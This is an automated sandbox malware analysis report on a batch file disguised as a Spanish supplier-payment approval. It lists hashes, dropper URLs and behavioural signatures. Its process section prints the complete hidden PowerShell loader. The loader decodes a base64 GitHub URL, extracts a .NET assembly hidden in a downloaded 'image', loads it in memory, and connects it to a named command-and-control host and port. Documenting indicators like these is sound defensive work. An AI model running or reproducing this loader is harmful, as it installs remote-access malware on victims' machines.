Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
29/10/2024, 22:46
Static task
static1
Behavioral task
behavioral1
Sample
TRANSACCIÓN Pagar proveedores ha sido Aprobada.bat
Resource
win7-20241023-en
6 signatures
180 seconds
General
-
Target
TRANSACCIÓN Pagar proveedores ha sido Aprobada.bat
-
Size
210KB
-
MD5
578af000aed63fa1ede68df809e4ecf1
-
SHA1
8d4879bda890604c497961d1a7fa629d857392eb
-
SHA256
063e9da93b4d0e7b9f9e78911962cb83fcb02d648fb8be4e4cfa24f4a828367d
-
SHA512
0a88222d321d8f2367d12bfaa85e0816960277953437da758d480efb2cfdc4cb444e897ec8060a5b684af749b95f2a615f87c5ede99bb6847b96f5be45b48829
-
SSDEEP
6144:vZXTzJ4W13nUOtjrquYrggU6qgAKggmcWg2w08:2
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true
exe.dropper
https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2340 powershell.exe 6 2340 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2340 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alojar.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alojar.bat cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2340 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 692 wrote to memory of 2340 692 cmd.exe 31 PID 692 wrote to memory of 2340 692 cmd.exe 31 PID 692 wrote to memory of 2340 692 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TRANSACCIÓN Pagar proveedores ha sido Aprobada.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-